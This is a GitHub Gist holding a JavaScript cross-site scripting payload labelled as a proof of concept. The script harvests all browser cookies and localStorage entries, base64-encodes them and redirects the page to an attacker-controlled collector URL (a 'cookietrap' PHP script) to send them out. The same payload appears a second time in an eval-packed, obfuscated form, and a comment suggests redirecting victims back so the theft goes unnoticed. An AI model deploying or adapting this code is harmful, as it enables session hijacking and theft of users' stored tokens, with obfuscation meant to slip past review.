Last active
November 9, 2022 17:38
-
-
Save nicovillanueva/fcbb451a38adb309b155 to your computer and use it in GitHub Desktop.
JS script for doing XSS POCs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // The collector must decode the base64-encoded parameter 'payload' | |
| // Suggestion: The PHP script could redirect back to the user's referer, such as: | |
| // header("Location: " . $_SERVER['HTTP_REFERER']); | |
| collector="http://192.168.40.6/cookietrap/trap.php?payload="; | |
| c=function(){ret=""; for(var i = 0; i < document.cookie.split(";").length; i++){ ret+=("- " + document.cookie.split(";")[i] + "\n");} return ret; }(); | |
| ls=function(){locStor = ""; for(var i = 0; i < localStorage.length; i++){ locStor += ("Key: " + localStorage.key(i) + "\nValue: " + localStorage.getItem(localStorage.key(i)) + "\n\n");} return locStor; }(); | |
| payload="Cookies: \n"+ c + "\nLocalStorage: \n" + ls; | |
| enc=btoa(payload); | |
| alert("Yar cookies are: \n" + c); | |
| alert("And your LocalStorage: \n" + ls ); | |
| alert("And now I have them."); | |
| document.location= collector + enc; | |
| // OFUSCATED | |
| eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('h="E://J.H.m.6/x/t.u?3=";c=e(){5="";j(d i=0;i<8.f.g(";").9;i++){5+=("- "+8.f.g(";")[i]+"\\n")}a 5}();2=e(){7="";j(d i=0;i<1.9;i++){7+=("w: "+1.k(i)+"\\y: "+1.F(1.k(i))+"\\n\\n")}a 7}();3="z: \\n"+c+"\\A: \\n"+2;b=B(3);4("p C D: \\n"+c);4("l q o: \\n"+2);4("l v I s r.");8.G=h+b;',46,46,'|localStorage|ls|payload|alert|ret||locStor|document|length|return|enc||var|function|cookie|split|collector||for|key|And|40||LocalStorage|Yar|your|them|have|trap|php|now|Key|cookietrap|nValue|Cookies|nLocalStorage|btoa|cookies|are|http|getItem|location|168||192'.split('|'),0,{})) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment